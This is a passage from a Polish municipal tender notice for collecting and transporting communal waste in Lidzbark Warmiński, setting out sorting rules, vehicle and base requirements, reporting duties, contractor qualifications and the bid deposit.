1) Worki do selektywnej zbiórki odpadów komunalnych powinny być opisane i oznaczone: nazwą, adresem, adresem e-mail, numerem telefonu Wykonawcy oraz informacją o rodzajach odpadów gromadzonych w nich:

a) worek koloru niebieskiego z napisem PAPIER  (do zbierania makulatury)
 
NALEŻY WRZUCAĆ:
- gazety i czasopisma,
- prospekty, katalogi,
- kartony i tekturę,
- zeszyty i książki,
- papier biurowy i kserograficzny
- papier pakowy,
- koperty

 NIE NALEŻY WRZUCAĆ:
- kartonów po napojach, sokach, mleku, 
- opakowań po papierosach,
- tapet,
- pieluch jednorazowych i innych artykułów higienicznych,
- papieru z folią,
- worków po cemencie, zaprawach,
- paragonów,
- resztek taśm z kas fiskalnych,
- papieru do pieczenia,
- papieru fotograficznego,
- kalki technicznej,
- papieru faksowego


b) worek koloru żółtego z napisem PLASTIK (do zbierania tworzywa sztucznego, 
     opakowań wielomateriałowych i metalu)

     NALEŻY WRZUCAĆ:
- plastikowe butelki po napojach, wodach mineralnych, sokach,
- opakowania po kosmetykach, płynach do mycia i chemii gospodarczej,
- plastikowe opakowania po żywności (np.: kubki po jogurtach, margarynach), 
- plastikowe wiadra, koszyki po owocach,
- folie opakowaniowe i worki, reklamówki,
- kawałki rur lub złączek PCV lub PET,
- kartony po napojach, sokach, mleku
- opakowania po papierosach,
- opakowania po zupkach, przyprawach,
- opakowania po lekach, pigułkach, 
- opakowania metalowe (puszki po art. spożywczych, pudełka, kapsle, nakrętki od słoików, itp.) 
- zepsute narzędzia metalowe,
- opakowania po aerozolach


 NIE NALEŻY WRZUCAĆ:
- styropianu i innych odpadów budowlanych,
- puszek po farbach,
- opakowań po olejach przemysłowych, silnikowych, płynach chłodniczych,
- opakowań po środkach chemicznych i środkach ochrony roślin,
- opakowań po klejach i rozpuszczalnikach,
- kabli i przewodów elektrycznych,
- baterii. 

c) worek koloru zielonego z napisem SZKŁO  (do zbierania szkła)

NALEŻY WRZUCAĆ:
- butelki  po napojach i żywności,
- słoiki po dżemach i przetworach,
- opakowania po kosmetykach,
- stłuczkę szklaną bez nakrętek, kapsli, korków. 

NIE NALEŻY WRZUCAĆ:
- ceramiki,
- szkła żaroodpornego,
 - szkła okiennego,
 - szyb samochodowych,
 - luster,
 - żarówek, świetlówek,
 - lamp neonowych, 
- bombek i ozdób choinkowych,
- ekranów telewizyjnych,

2) Po każdorazowym odbiorze odpadów selektywnie zbieranych, Wykonawca pozostawi worki w ilości odpowiadającej odebranym workom. Worki należy przekazywać właścicielowi nieruchomości. 
Odbierane będą worki zapełnione co najmniej w połowie ich objętości.
3) Wykonawca zapewnia worki o poj. 120 l do selektywnej zbiórki odpadów tylko mieszkańcom nieruchomości zamieszkałych do 4 lokali mieszkalnych oraz właścicielom nieruchomości niezamieszkałych.

10. Obowiązki związane z prowadzeniem dokumentacji związanej z realizacją przedmiotu zamówienia.
 Wykonawca zobowiązany jest do: 
- uzyskania potwierdzenia ilości i rodzaju zebranych odpadów przekazanych do punktów odbioru,
- sporządzania ustawowych sprawozdań,
- niezwłocznego informowania Zamawiającego o innej klasyfikacji odpadów przy odbiorze niż wynikającej z deklaracji mieszkańców.

11. Szczegółowe wymagania stawiane Wykonawcy:
     Wykonawca zobowiązany jest do spełnienia wymagań określonych w Rozporządzeniu 
     Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań               
     w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 
     r. poz. 122), a w szczególności:
1)  Wykonawca powinien posiadać bazę magazynowo-transportową usytuowaną             
     w Gminie Miejskiej Lidzbark Warmiński lub w odległości nie większej niż  60 km od
     granicy administracyjnej miasta Lidzbark Warmiński i położonej na terenie do którego 
     posiada tytuł prawny.
2)  W zakresie wyposażenia bazy magazynowo-transportowej należy zapewnić aby:
- teren był zabezpieczony przed dostępem osób nieupoważnionych,
- miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu,
- miejsca magazynowania selektywnie zbieranych odpadów komunalnych były zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
- teren bazy magazynowo-transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z przepisami Prawo Wodne,
	baza magazynowo-transportowa była wyposażona w:
	miejsca przeznaczone do parkowania pojazdów,
	pomieszczenia socjalne dla pracowników odpowiadających ilości  zatrudnionych osób,
	miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
	legalizowaną samochodową wagę najazdową  w przypadku gdy na terenie bazy następuje magazynowanie odpadów.
3)  Na terenie bazy magazynowo-transportowej powinny znajdować się także:
- punkt bieżącej konserwacji i naprawy pojazdów,
- miejsce do mycia i dezynfekcji pojazdów  o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.
4) W zakresie posiadania wyposażenia umożliwiającego odbiór odpadów od właścicieli     nieruchomości oraz jego stanu technicznego Wykonawca musi  zapewnić:
   a) co najmniej dwa pojazdy do odbierania zmieszanych odpadów komunalnych,                     z funkcją kompaktującą, spełniające normę emisji spalin min. EURO 4,  przystosowane do odbioru odpadów komunalnych z pojemników o pojemności  od 110 l do 7000 l,
b) co najmniej dwa pojazdy z funkcją kompaktującą, spełniające normę emisji spalin min. EURO 4, przystosowane do odbierania selektywnie zebranych odpadów komunalnych z pojemników od 110 l  do 1100 l,
          c) co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej,
          d) co najmniej jeden pojazd bramowy lub hakowy do transportu pojemników 
              o pojemności 5000 l i 7000 l,
          e) na terenie bazy magazynowo-transportowej urządzenia do selektywnego 
   gromadzenia odpadów komunalnych przed ich transportem do miejsc 
   przetwarzania.
5) Pojazdy powinny być trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerami telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości.
6) Pojazdy powinny mieć konstrukcję zabezpieczającą przed rozwiewaniem i rozpylaniem
      przewożonych odpadów oraz minimalizującą oddziaływanie czynników atmosferycznych na odpady. 
7) Pojazdy zbierające odpady selektywnie zebrane muszą być oznakowane na dwóch burtach tablicami o wymiarach co najmniej 75x100 cm z napisem określającym zbieraną frakcję, tj.  makulatura, plastik, szkło, popiół
 8)  Pojazdy (wymienione w ust. 11 pkt 4 lit. a, b, c ) powinny być wyposażone w:
- system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych         o położeniu pojazdu i miejscach postojów oraz czujniki zapisujące dane
o miejscach wyładunku odpadów umożliwiający weryfikację tych danych, 
 - urządzenia lub narzędzia do sprzątania terenu po opróżnieniu pojemników.
9) Co najmniej jeden pojazd  z funkcją kompaktującą powinien być przystosowany do odbierania selektywnie zebranych odpadów komunalnych z pojemników o poj. od 110 l do 1100 l pochodzących z nieruchomości położonych w ciasnej zabudowie śródmiejskiej, a wymiar pojazdów nie powinien  przekraczać:   245 cm szer./ 800 cm dł./330 cm wys.

12. Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych            w przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (tj. oświadczenie + dokumentację fotograficzną) na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Dokumentację wraz z wykazem właścicieli nieprawidłowo segregujących odpady przekaże Zamawiającemu. 
13. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. odbioru odpadów komunalnych, ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych. Zakazuje się mieszania:
1) selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi,
      2) selektywnie zebranych odpadów różnych rodzajów ze sobą.
14. Wykonawca zobowiązany jest do świadczenia usług w sposób zapewniający osiągnięcie poziomów recyklingu, przygotowania do ponownego użycia i odzysku frakcji odpadów obejmujących papier, metale, tworzywa sztuczne i szkło oraz inne niż niebezpieczne odpady budowlane i rozbiórkowe, wyliczanych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645) oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.
Wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku wskazanych powyżej frakcji odpadów w roku 2017 powinny wynosić odpowiednio:
      1) papier, metale, tworzywa sztuczne i szkło - co najmniej 20%,
      2) inne niż niebezpieczne odpady budowlane i rozbiórkowe  co najmniej 45%.

15. Wykonawca zobowiązany jest do:
a)	Ważenia wszystkich odebranych zmieszanych odpadów komunalnych w punkcie wagowym zlokalizowanym w miejscu przekazywania odpadów do zagospodarowania,
b)	Przekazywania odpadów do uprawnionego przedsiębiorcy wykonującego działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych 
i uzyskania od niego potwierdzenia odbioru odpadów zebranych z terenu Gminy Miejskiej Lidzbark Warmiński na karcie przekazania odpadu,
c)	Terminowego zbierania i wywożenia odpadów,
d)	W przypadku przeładowywania odpadów - dokonywać tego należy w legalnym                     i przystosowanym do tego celu miejscu.
e)	Niezwłocznego zawiadomienia Zamawiającego o okolicznościach przeszkadzających w prawidłowym wykonaniu usługi,
f)	Rozliczania się z wykonywanych usług poprzez przedstawienie wymaganych przepisami dokumentów,
g)	Utrzymania w należytym stanie technicznym, sanitarnym i porządkowym narzędzi 
i urządzeń wykorzystywanych na potrzeby realizacji przedmiotu zamówienia,
h)  Utrzymania miejsc po odbiorze odpadów komunalnych w należytej czystości    
    (wymagane jest sprzątanie po zabranych workach lub opróżnieniu pojemników),
   i) Dokonywania odbioru i transportu odpadów również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych będzie czasowo utrudniony z powodu prowadzonych remontów dróg, dojazdów, złych warunków atmosferycznych.  
W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
           j) W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy    nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym                       i Wykonawcą. 
            k) Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi       wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
     l) Wykonawca ma obowiązek uruchomienia monitoringu pozycjonowania satelitarnego na 1 stanowisku komputerowym Zamawiającego w terminie do dnia 31.12.2016 r.
    ł)  Wykonawca zobowiązany jest archiwizować zapisy o położeniu pojazdu i miejscach postojów oraz o miejscach wyładunku odpadów uzyskanych z czujników GPS przez okres 12 miesięcy dla każdego pojazdu.

16. Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.:
a)	Miesięczne zestawienie odebranych odpadów komunalnych zmieszanych,                             w terminie 7 dni kalendarzowych od zakończenia danego miesiąca, potwierdzone kartami przekazania odpadu i dowodami ważenia.
b)	Miesięczne zestawienie odebranych odpadów komunalnych segregowanych              z uwzględnieniem ilości odpadów zebranych przez MPSZOK oraz raport zebranych   z aptek  przeterminowanych leków w terminie 7 dni kalendarzowych od zakończenia danego miesiąca, potwierdzone kartami przekazania odpadu, dowodami ważenia, oraz fakturami potwierdzającymi zakup worków do selektywnej zbiórki odpadów.
c)	Półroczne sprawozdania o masie poszczególnych rodzajów odpadów komunalnych oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji do której zostały one przekazane. Ww. sprawozdania należy przekazać Zamawiającemu do końca miesiąca następującego po upływie półrocza, którego dotyczy.

17. Przedmiot zamówienia wg. Wspólnego Słownika Zamówień (CPV): 
90500000-2 -  Usługi związane z odpadami,
90511000-2 - Usługi wywozu odpadów,
90512000-9 - Usługi transportu odpadów,
90533000-2 - Usługi gospodarki odpadami.

18. Zamawiający nie dopuszcza możliwości składania ofert częściowych. Oferta musi      
  obejmować całość zamówienia.
19. Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej. 
20. Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla  
      wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne.
22.  Zamawiający, stosownie do art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez 
wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (t.j. Dz.U. z 2016 r., poz. 1666). 
Szczegółowe warunki realizacji wymagań określonych przez Zamawiającego na podstawie art. 29 ust. 3a ustawy Pzp, w szczególności sposób dokumentowania zatrudnienia, uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań, o których mowa powyżej oraz sankcje z tytułu niespełnienia tych wymagań, a także rodzaj czynności niezbędnych do realizacji zamówienia, zostały zawarte w części XIX specyfikacji istotnych warunków zamówienia.
23. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust.  1 pkt 6) ustawy Pzp.

<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90511000-2,
                90512000-9,
                90533000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art.67 ust.1 pkt.6 ustawy Pzp, stanowiących nie więcej niż 8,5% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień w zakresie odbioru i transportu odpadów komunalnych.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                
Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że:
    
a) posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów 
    komunalnych objętych przedmiotem zamówienia od właścicieli nieruchomości z terenu Gminy Miejskiej Lidzbark Warmiński, zgodnie z wymogami ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz.U z 2016 r. Poz. 250 z późn. zm.),
b) posiada aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych wydane przez właściwy organ zgodnie z ustawą o odpadach z dnia14 grudnia 2012 r. (Dz.U. z 2013 r.,  poz. 21, ze zm.),
c) posiada aktualne zezwolenie na zbieranie odpadów (przewidzianych do zbierania               w MPSZOK, określonych w części IV ust. 7 pkt 3 niniejszej SIWZ), wydane przez właściwy organ zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz.U. 
z 2013 r. poz. 21, ze zm).
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na kwotę nie niższą niż 300 000,00 zł (słownie: trzysta tysięcy złotych).
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli:
1) Wykonawca wykaże, że wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie: 
      - co najmniej jedną usługę polegającą na odbiorze i przekazywaniu do zagospodarowania odpadów komunalnych o wartości nie mniejszej niż 300 000,00 złotych brutto (słownie: trzysta tysięcy złotych brutto),
 lub 
      	   - co najmniej jedną usługę polegającą na odbiorze i przekazywaniu do zagospodarowania oraz zagospodarowaniu odpadów komunalnych o wartości nie mniejszej niż 600 000,00 złotych brutto (słownie: sześćset tysięcy złotych  brutto).
        Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą  
        wykazać, że łącznie spełniają powyższy warunek.

2) Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej  siedmioma następującymi osobami, zatrudnionymi na podstawie umowy o pracę, które będą uczestniczyć w wykonaniu zamówienia:
a)  co najmniej jedną osobą do kierowania usługami polegającymi na odbiorze                              i zagospodarowaniu odpadów komunalnych, posiadającą minimum 5 letnie doświadczenie w kierowaniu wykonywaniem usługi lub usług odbioru
i zagospodarowania odpadów komunalnych. 
b)  co najmniej jedną osobą posiadającą kwalifikacje i doświadczenie w wykonywaniu napraw pojazdów, tj.:
    - wykształcenie min. zawodowe w kierunku mechanik pojazdów samochodowych,
    -  minimum  3-letnie doświadczenie w naprawach samochodów.
        c)   co najmniej pięcioma  osobami posiadającymi następujące  uprawnienia:
     -  prawo jazdy kat. C
     -  świadectwo kwalifikacji zawodowej (przewóz rzeczy).
  3) Dysponuje następującymi pojazdami i urządzeniami, w celu wykonania  zamówienia:  
a) co najmniej dwoma pojazdami do odbierania zmieszanych odpadów komunalnych,
 z funkcją kompaktującą, spełniającymi normę emisji spalin min. EURO 4, przystosowanymi do odbioru odpadów komunalnych  z pojemników  o pojemności  od 110 l do 7000 l,
b) co najmniej dwoma pojazdami z funkcją kompaktującą spełniającymi normę emisji spalin min. EURO 4, przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych z pojemników o pojemności od 110 l  do 1100 l,
c) co najmniej jednym pojazdem przystosowanym do odbierania odpadów bez funkcji kompaktującej,
d) co najmniej jednym pojazdem bramowym lub hakowym przystosowanym do transportu pojemników  o pojemności 5000 l i 7000 l,
e) na terenie bazy magazynowo-transportowej - urządzeniami do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą  wykazać, że łącznie spełniają powyższy warunek.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">  W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału                            w postępowaniu, Zamawiający żąda następujących dokumentów:
1. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2.	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełnienia przez Wykonawcę warunków, 
o których mowa w art. 22 ust. 1b pkt.1) ustawy Pzp, należy na wezwanie zamawiającego, pod rygorem wykluczenia z postępowania, złożyć w wyznaczonym przez zamawiającego terminie następujące oświadczenia 
i dokumenty:
1. zaświadczenie (lub inny dokument) o posiadaniu aktualnego zezwolenia na prowadzenie działalności w zakresie transportu odpadów komunalnych wydane przez właściwy organ zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz.U.2013 r., poz. 21 z późn. zm.),
2. zaświadczenie (lub inny dokument) o posiadaniu aktualnego zezwolenia na zbieranie odpadów (przewidzianych do zbierania w MPSZOK, określonych 
w części IV ust. 7 pkt 3 niniejszej SIWZ), wydane przez właściwy organ zgodnie z ustawą o odpadach  z dnia 14 grudnia 2012 r. (Dz.U. z 2013 r., poz. 21 z późn. zm.)
3. zaświadczenie (lub inny dokument) o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych objętych przedmiotem niniejszego zamówienia od właścicieli nieruchomości z terenu  Gminy Miejskiej Lidzbark Warmiński, zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku  w gminach (t.j. Dz. U z 2016 r., poz. 250, z późn. zm.)
   W celu oceny spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust.1 b pkt. 2) ustawy Pzp, należy na wezwanie zamawiającego, pod rygorem wykluczenia z postępowania, złożyć w wyznaczonym terminie następujące oświadczenia i dokumenty:
1. dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na sumę gwarancyjną min. 300 000,00 zł
  W celu spełnienia przez wykonawcę warunków o których mowa, w art. 22 ust 1b pkt. 3) ustawy Pzp, należy na wezwanie zamawiającego, pod rygorem wykluczenia z postępowania, złożyć  w wyznaczonym przez Zamawiającego terminie następujące oświadczenia i dokumenty:
1. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane.
2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami
3. wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami.



<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zgodnie z art. 24 ust. 11 ustawy Pzp, Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie 
o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. 
Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody,  że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp stanowi Załącznik nr 9 do SIWZ. Oświadczenie należy przekazać Zamawiającemu w oryginale w formie pisemnej.

W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b><br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium w wysokości:    
    5 000,00 PLN (słownie: pięć tysięcy złotych), na cały okres związania ofertą, 
    który wynosi 30 dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem 
    terminu składania ofert.
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2014, poz. 1804 r., z późń. zm.).
4. Miejsce i sposób wniesienia wadium.
